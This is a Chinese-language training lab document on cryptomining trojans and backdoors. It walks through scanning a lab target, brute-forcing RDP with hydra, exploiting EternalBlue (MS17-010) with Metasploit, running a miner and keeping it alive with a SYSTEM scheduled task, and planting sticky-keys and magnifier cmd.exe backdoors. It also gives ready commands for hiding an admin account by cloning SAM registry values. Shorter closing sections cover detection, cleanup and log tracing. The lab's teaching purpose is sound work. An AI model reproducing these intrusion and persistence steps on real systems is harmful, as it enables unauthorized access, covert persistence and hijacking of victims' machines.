挖矿木马和后门植入的渗透测试及应急响应项目

1.1概述

实训目标：

1. 提高学员对挖矿木马的认知，了解挖矿木马的传播途径、攻击原理和危害。

2. 学习并掌握挖矿木马的检测方法和应急响应措施，提高网络安全防护能力。

3. 培养学员在实际工作中应对挖矿木马攻击的实战技能，提升网络安全防护水平。

实训内容：

1. 挖矿木马概述：介绍挖矿木马的定义、传播途径、攻击原理和危害。

2. 挖矿木马检测：学习并掌握使用各种工具和方法检测挖矿木马的技术。

3. 挖矿木马应急响应：学习并掌握在发现挖矿木马时进行应急响应的措施和流程。

4. 实战演练：通过模拟实战环境，让学员亲身参与挖矿木马的检测和应急响应过程，提高实战技能。

1.2相关漏洞

3389（RDP）CVE-2019-0708

445 MS17-010       永恒之蓝

1.3相关实训过程

1.3.1 3389（RDP）CVE-2019-0708 漏洞复现

首先在kali中打开终端,使用命令nmap -sP 192.168.42.0/24扫描整个网段主机:

经过排查后锁定靶机IP:192.168.42.130;

使用命令 nmap 192.168.42.130 扫描靶机开放端口情况:

得知3389远程服务链接端口开放,我们使用kali自带模块hydra进行暴力攻击,目的是爆破靶机用户名及密码;

命令hydra查看模块使用方法:

使用命令 hydra -L /home/kali/Desktop/p.txt -P /home/kali/Desktop/p.txt rdp://192.168.42.130进行爆破攻击,其中p.txt为本地字典,使用者根据实际情况自行更改,可以看到,爆破成功,获得用户名及密码:

在物理机上win+R输入mstsc,打开远程桌面连接:

输入爆破所得账户、密码,成功登入靶机:

1.3.2 445端口   MS17-010   永恒之蓝复现

使用kali自带模块msfconsole:

使用第三个辅助模块探测靶机是否存在永恒之蓝漏洞:

命令 use 3

show options 展示必须配置的参数:

set RHOSTS 192.168.42.130  设置靶机IP

run   测试一下:

很可能存在永恒之蓝漏洞;

use 0  使用编号为0的模块进行攻击

show options 配置参数

set RHOSTS 192.168.42.130  设置靶机IP

run  开始攻击;

当有如下界面说明攻击成功:

使用命令 ifconfig 可以查看已经攻入靶机:

1.3.3 植入后门、木马

经过前两步的攻击,我们可以在目标靶机上植入一些木马(例如挖矿木马),或是留下一些后门(例如粘滞键、放大镜后门、隐藏账户;

1.3.3.1 挖矿木马

先通过远程桌面查看靶机c盘:

在kali的永恒之蓝复现中进行上传木马:

可以看到,木马压缩包已成功上传至靶机;

回到物理机,mstsc远程连接靶机并解压木马压缩包,

Kali中执行挖矿木马 execute -f c://wkbd/javs.exe

可以看到进程已经成功创建;

回到靶机,查看CPU利用率,说明木马已经运行

远程靶机cmd中运行schtasks /create /tn system /sc minute /mo 1 /tr C:\wkbd\javs.exe  /ru system /f

创建一个system计划任务，每一分钟执行一次javs.exe

以防止挖矿木马被关闭

可以看到,关闭木马后一分钟再次启动

1.3.3.2 粘滞键后门

首先创建一个sethc副本，将原sethc文件删除（也可将sethc文件重命名）,复制一个cmd文件，并将cmd副本重命名为sethc

此处是cmd副本修改之后的

可以看到注册表中sethc.exe的路径已经被篡改.

再次开启虚拟机，开启后按五次shift键，会出现cmd界面

 创建一个用户，这时就可以用该用户登录系统搞破坏了

1.3.3.3 放大镜后门

首先编写一下代码

cd c:\windows\system32

takeown /f magnify.exe

icacls magnify.exe /grant administrator:F

ren magnify.exe magnify_back.exe

copy cmd.exe magnify.exe

保存为.bat文件

然后把这个文件以管理员权限执行，（如果不是管理员权限则不可以）
这样就留下了你的后门

点击登录页面的放大镜。

会弹出管理员权限的cmd运行框，这就可以完全掌控这台电脑了。

1.3.3.4 创建隐藏账户

我们给自己创建一个隐藏的账户。net user 是看不见zyh$的

然后将zyh$添加到管理员组

这种隐藏net user看不见

那么怎么使用隐藏账户登录呢，需要ctrl+alt+del打开任务管理器，切换用户，它就会出来了

当然这种隐藏只是net user看不见，但是在系统用户中还是可以看见，接下来修改注册表。

打开注册表，到“HKEY_LOCAL_MACHINE\SAM\SAM”，单机右建权限，把名叫：administrator的用户给予：完全控制以及读取的权限。然后重新打开注册表, 来到注册表编辑器的“HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names”处，将“000001F4”的F值复制到“000003EC”的F值中，保存。

分别将zyh$和000003EC导出到桌面命名为123,456，删除zyh$用户 和000003EC

将123和456导入注册表

这样隐藏账户就完成了。再看用户里面没有zyh$账户，只有在注册表里才能看见

1.3.4 排查 处置

1.3.4.1挖矿木马的排查处置

发现某一时间段CPU使用率过高

打开进程,发现异常:

定位程序位置

关闭可疑程序,CPU使用率下降

初步确定木马,打开任务计划程序

将system禁用:

之后将木马文件删除即可彻底关闭木马

1.3.4.2 粘滞键的排查与处置(放大镜类似)

打开Autoruns

可以看到粘滞键的路径错误,返回注册表将路径重新恢复即可修复粘滞键后门;

1.3.4.3 隐藏账户的排查处置

进入注册表此目录:

将对应的name--zyh$与Users全部删除

可以看到zyh$已被清除

1.3.5 日志分析溯源

首先将旧的事件日志删除:

运行:

生成新的事件日志

复制新生成的事件日志到下面的目录,并先将下面目录内容全部删除,

打开bin目录下:

可以看到date目录下生成新的日志文件:

分析溯源推测黑客ip,攻击时间,是否攻击成功